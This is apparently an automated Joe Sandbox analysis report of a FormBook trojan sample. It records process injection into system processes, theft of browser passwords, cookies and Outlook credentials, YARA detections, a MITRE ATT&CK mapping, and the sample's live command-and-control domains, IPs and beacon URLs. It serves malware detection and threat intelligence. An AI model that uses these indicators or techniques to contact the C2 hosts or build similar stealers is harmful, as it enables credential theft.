Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtOpenKeyEx: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\winver.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\winver.exe

Thread register set: target process: 5920

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\winver.exe

Thread APC queued: target process: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EED008

Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003B87B1 LogonUserW,

0_2_003B87B1

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00363B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00363B3A

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_003648D7

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003C4C27 mouse_event,

0_2_003C4C27

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\aBEh0fsi2c.exe"	Jump to behavior
Source: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe	Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_003B7CAF

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_003B874B

Source: aBEh0fsi2c.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: aBEh0fsi2c.exe, XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: XWDsAjkFcK.exe, 00000004.00000000.1594270788.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555496782.0000000001521000.00000002.00000001.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1744282619.00000000014E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_0038862B cpuid

0_2_0038862B

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00394E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00394E87

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003A1E06 GetUserNameW,

0_2_003A1E06

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_00393F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00393F3A

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe

Code function: 0_2_003649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003649A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\winver.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: aBEh0fsi2c.exe	Binary or memory string: WIN_81
Source: aBEh0fsi2c.exe	Binary or memory string: WIN_XP
Source: aBEh0fsi2c.exe	Binary or memory string: WIN_XPe
Source: aBEh0fsi2c.exe	Binary or memory string: WIN_VISTA
Source: aBEh0fsi2c.exe	Binary or memory string: WIN_7
Source: aBEh0fsi2c.exe	Binary or memory string: WIN_8
Source: aBEh0fsi2c.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003D6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_003D6283
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_003D6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_003D6747
Source: C:\Users\user\Desktop\aBEh0fsi2c.exe	Code function: 0_2_00397AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	0_2_00397AA1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
aBEh0fsi2c.exe	32%	Virustotal		Browse
aBEh0fsi2c.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
aBEh0fsi2c.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.fortevision.xyz/dash/	0%	Avira URL Cloud	safe
http://www.rtpterbaruwaktu3.xyz/mv7p/	0%	Avira URL Cloud	safe
http://www.rtpterbaruwaktu3.xyz	0%	Avira URL Cloud	safe
http://www.bpgroup.site/mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr	0%	Avira URL Cloud	safe
http://www.rtpterbaruwaktu3.xyz/mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr	0%	Avira URL Cloud	safe
http://www.ytsd88.top/8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr	0%	Avira URL Cloud	safe
http://www.jijievo.site/z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr	0%	Avira URL Cloud	safe
http://www.bpgroup.site/mlxg/	0%	Avira URL Cloud	safe
http://www.fortevision.xyz/dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg==	0%	Avira URL Cloud	safe
http://www.ytsd88.top/8qt7/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
all.wjscdn.com	154.90.58.209	true	true	unknown
ymx01.cn	8.218.14.120	true	true	unknown
bpgroup.site	74.48.143.82	true	true	unknown
www.ytsd88.top	47.76.213.197	true	false	high
www.fortevision.xyz	13.248.169.48	true	true	unknown
rtpterbaruwaktu3.xyz	103.21.221.87	true	true	unknown
www.bpgroup.site	unknown	unknown	false	unknown
www.rtpterbaruwaktu3.xyz	unknown	unknown	true	unknown
www.grandesofertas.fun	unknown	unknown	false	unknown
www.jijievo.site	unknown	unknown	false	unknown
www.prhmcjdz.tokyo	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.rtpterbaruwaktu3.xyz/mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr	true	Avira URL Cloud: safe	unknown
http://www.bpgroup.site/mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr	true	Avira URL Cloud: safe	unknown
http://www.fortevision.xyz/dash/	true	Avira URL Cloud: safe	unknown
http://www.rtpterbaruwaktu3.xyz/mv7p/	true	Avira URL Cloud: safe	unknown
http://www.bpgroup.site/mlxg/	true	Avira URL Cloud: safe	unknown
http://www.ytsd88.top/8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr	true	Avira URL Cloud: safe	unknown
http://www.ytsd88.top/8qt7/	true	Avira URL Cloud: safe	unknown
http://www.jijievo.site/z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr	true	Avira URL Cloud: safe	unknown
http://www.fortevision.xyz/dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rtpterbaruwaktu3.xyz	XWDsAjkFcK.exe, 00000006.00000002.2560990702.00000000053A3000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bt.cn/?from=404	winver.exe, 00000005.00000002.2560762687.0000000005888000.00000004.10000000.00040000.00000000.sdmp, XWDsAjkFcK.exe, 00000006.00000002.2559116718.0000000003608000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	winver.exe, 00000005.00000002.2563109853.0000000007EA8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.fortevision.xyz	United States	16509	AMAZON-02US	true
103.21.221.87	rtpterbaruwaktu3.xyz	unknown	9905	LINKNET-ID-APLinknetASNID	true
47.76.213.197	www.ytsd88.top	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
154.90.58.209	all.wjscdn.com	Seychelles	40065	CNSERVERSUS	true
74.48.143.82	bpgroup.site	Canada	14663	TELUS-3CA	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588004
Start date and time:	2025-01-10 20:25:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	aBEh0fsi2c.exe renamed because original name is a hash value
Original Sample Name:	9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@7/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 85% Number of executed functions: 52 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
14:27:22	API Interceptor	1361567x Sleep call for process: winver.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	www.sfantulandrei.info/wvsm/
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	www.108.foundation/lnu5/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.tals.xyz/h8xm/
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	www.bcg.services/5onp/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.shipley.group/5g1j/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
